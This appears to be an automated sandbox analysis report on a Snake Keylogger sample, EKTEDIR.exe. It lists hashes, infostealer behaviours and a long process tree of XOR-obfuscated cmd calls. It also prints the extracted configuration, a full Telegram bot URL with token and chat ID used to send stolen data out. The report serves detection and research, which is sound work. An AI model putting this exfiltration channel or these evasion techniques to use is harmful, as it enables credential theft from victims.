Overview
overview
10Static
static
3EKTEDIR.exe
windows7-x64
10EKTEDIR.exe
windows10-2004-x64
10$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Hylozoism/...37.gen
windows7-x64
3Hylozoism/...37.gen
windows10-2004-x64
3Hylozoism/...et.rav
windows7-x64
3Hylozoism/...et.rav
windows10-2004-x64
3Hylozoism/...16.vre
windows7-x64
3Hylozoism/...16.vre
windows10-2004-x64
3Hylozoism/Unfrail.nay
windows7-x64
3Hylozoism/Unfrail.nay
windows10-2004-x64
3Hylozoism/...rs.stj
windows7-x64
3Hylozoism/...rs.stj
windows10-2004-x64
3Hylozoism/...ly.txt
windows7-x64
1Hylozoism/...ly.txt
windows10-2004-x64
1Hylozoism/smudses.yde
windows7-x64
3Hylozoism/smudses.yde
windows10-2004-x64
3Occluding225.ten
windows7-x64
3Occluding225.ten
windows10-2004-x64
3Analysis
-
max time kernel
146s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 07:32
Static task
static1
Behavioral task
behavioral1
Sample
EKTEDIR.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
EKTEDIR.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240704-en
Behavioral task
behavioral7
Sample
Hylozoism/Forbundsformndene237.gen
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
Hylozoism/Forbundsformndene237.gen
Resource
win10v2004-20240704-en
Behavioral task
behavioral9
Sample
Hylozoism/Haardhudet.rav
Resource
win7-20240705-en
Behavioral task
behavioral10
Sample
Hylozoism/Haardhudet.rav
Resource
win10v2004-20240704-en
Behavioral task
behavioral11
Sample
Hylozoism/Herbiest116.vre
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
Hylozoism/Herbiest116.vre
Resource
win10v2004-20240704-en
Behavioral task
behavioral13
Sample
Hylozoism/Unfrail.nay
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
Hylozoism/Unfrail.nay
Resource
win10v2004-20240704-en
Behavioral task
behavioral15
Sample
Hylozoism/afrettelsers.stj
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
Hylozoism/afrettelsers.stj
Resource
win10v2004-20240708-en
Behavioral task
behavioral17
Sample
Hylozoism/figurally.txt
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
Hylozoism/figurally.txt
Resource
win10v2004-20240704-en
Behavioral task
behavioral19
Sample
Hylozoism/smudses.yde
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
Hylozoism/smudses.yde
Resource
win10v2004-20240704-en
Behavioral task
behavioral21
Sample
Occluding225.ten
Resource
win7-20240704-en
Behavioral task
behavioral22
Sample
Occluding225.ten
Resource
win10v2004-20240704-en
General
-
Target
EKTEDIR.exe
-
Size
775KB
-
MD5
0d0f944239a7dd07826e28edf9647185
-
SHA1
3911f09935fb37f9f6cc3ff990e12e6143282d8a
-
SHA256
c58de5f40be8fd760fc08b1ef7ae5a3f5771dbc214426156e3a21a89bb8303fc
-
SHA512
e5077fa3179d7082587d606b8c8c6b5c0d74794225394522d92a06295e962a1cdb9868ac415720e3908222cc6c55312d24868be8d8ec2e52ef81243080fe5b7e
-
SSDEEP
12288:7akAv7gfFvt8pjs0p1cvxM/r9RKGqHmIdD+c:+kiext2Y0QMz9RKHHF9D
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7377884885:AAGDE6_d9hXHQkXeQnXVnXZia5CIJu4gajM/sendMessage?chat_id=7161549085
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2124-974-0x00000000004A0000-0x00000000016F4000-memory.dmp family_snakekeylogger behavioral2/memory/2124-975-0x00000000004A0000-0x00000000004C6000-memory.dmp family_snakekeylogger -
Loads dropped DLL 64 IoCs
Processes:
EKTEDIR.exepid process 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe 2392 EKTEDIR.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
EKTEDIR.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 EKTEDIR.exe Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 EKTEDIR.exe Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 EKTEDIR.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 47 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
EKTEDIR.exepid process 2124 EKTEDIR.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
EKTEDIR.exeEKTEDIR.exepid process 2392 EKTEDIR.exe 2124 EKTEDIR.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
EKTEDIR.exedescription pid process target process PID 2392 set thread context of 2124 2392 EKTEDIR.exe EKTEDIR.exe -
Drops file in Program Files directory 2 IoCs
Processes:
EKTEDIR.exedescription ioc process File created C:\Program Files (x86)\Common Files\rampire.lnk EKTEDIR.exe File opened for modification C:\Program Files (x86)\breplanerne\Pist.ini EKTEDIR.exe -
Drops file in Windows directory 2 IoCs
Processes:
EKTEDIR.exedescription ioc process File opened for modification C:\Windows\Fonts\sysselstter\Complexer.ini EKTEDIR.exe File opened for modification C:\Windows\resources\0409\Markazes\Sprtter.Dem EKTEDIR.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
EKTEDIR.exepid process 2124 EKTEDIR.exe 2124 EKTEDIR.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
EKTEDIR.exepid process 2392 EKTEDIR.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
EKTEDIR.exedescription pid process Token: SeDebugPrivilege 2124 EKTEDIR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EKTEDIR.exedescription pid process target process PID 2392 wrote to memory of 4956 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4956 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4956 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3080 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3080 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3080 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3916 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3916 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3916 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3440 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3440 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3440 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1168 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1168 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1168 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4436 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4436 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4436 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 548 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 548 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 548 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5016 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5016 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5016 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1156 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1156 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1156 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 2772 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 2772 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 2772 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4828 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4828 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4828 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1432 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1432 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1432 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3068 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3068 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 3068 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1852 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1852 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 1852 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4956 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4956 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4956 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5084 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5084 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5084 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4132 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4132 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4132 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4940 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4940 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4940 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4928 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4928 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 4928 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 2072 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 2072 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 2072 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5032 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5032 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 5032 2392 EKTEDIR.exe cmd.exe PID 2392 wrote to memory of 760 2392 EKTEDIR.exe cmd.exe -
outlook_office_path 1 IoCs
Processes:
EKTEDIR.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 EKTEDIR.exe -
outlook_win_path 1 IoCs
Processes:
EKTEDIR.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 EKTEDIR.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "250^177"2⤵PID:4956
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:3080
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "227^177"2⤵PID:3916
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "255^177"2⤵PID:3440
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:1168
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "253^177"2⤵PID:4436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:548
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:5016
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:1156
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:2772
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "242^177"2⤵PID:4828
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:1432
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:3068
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "208^177"2⤵PID:1852
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "197^177"2⤵PID:4956
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:5084
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "247^177"2⤵PID:4132
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4940
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:4928
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:2072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "240^177"2⤵PID:5032
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "153^177"2⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "220^177"2⤵PID:1384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4588
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:4340
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "133^177"2⤵PID:1068
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:3192
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:688
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1168
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "201^177"2⤵PID:372
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "137^177"2⤵PID:4880
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:5104
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1880
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:3544
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:3684
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:912
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:2012
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:4560
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:4116
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3852
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:212
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3080
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4736
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "193^177"2⤵PID:4464
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1492
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:2108
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:1840
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4216
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4660
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4036
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "133^177"2⤵PID:4220
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:4420
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4024
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:216
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:876
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "201^177"2⤵PID:1100
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "137^177"2⤵PID:4032
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1760
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:2244
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1788
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:2632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1336
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "152^177"2⤵PID:4724
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:2712
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "159^177"2⤵PID:1984
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3692
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:5072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "141^177"2⤵PID:4256
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "250^177"2⤵PID:3244
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:1268
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "227^177"2⤵PID:1632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "255^177"2⤵PID:3108
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:744
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "253^177"2⤵PID:116
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:228
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:4748
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:4632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:2772
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "231^177"2⤵PID:1340
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4036
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3988
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "197^177"2⤵PID:4560
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "196^177"2⤵PID:1588
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "208^177"2⤵PID:3936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:1376
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "240^177"2⤵PID:3260
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:3172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:4928
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "222^177"2⤵PID:4992
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "210^177"2⤵PID:3696
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "153^177"2⤵PID:4536
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:2892
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3536
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:3888
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:3248
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4408
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1948
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "133^177"2⤵PID:3988
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:3572
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "135^177"2⤵PID:5072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:4672
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "134^177"2⤵PID:736
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:876
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:2924
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:804
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1564
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:2108
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:4572
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "201^177"2⤵PID:1156
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:1636
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:4724
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:4088
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:3724
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4116
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:3504
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4024
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:2324
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "201^177"2⤵PID:4132
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "133^177"2⤵PID:3172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:4928
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "152^177"2⤵PID:4420
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "193^177"2⤵PID:4504
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "159^177"2⤵PID:4664
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3804
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "141^177"2⤵PID:1784
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "250^177"2⤵PID:1324
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:5052
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "227^177"2⤵PID:2012
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "255^177"2⤵PID:2832
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:3904
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "253^177"2⤵PID:3852
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:4492
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:1332
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:1268
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:208
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "226^177"2⤵PID:3468
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:4072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "197^177"2⤵PID:2560
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "247^177"2⤵PID:4172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:2632
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:1336
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:4568
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "225^177"2⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "222^177"2⤵PID:4908
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1060
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "223^177"2⤵PID:4844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "197^177"2⤵PID:448
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:4852
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:2696
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "153^177"2⤵PID:3936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:2868
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:2924
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:4736
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:548
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4420
-
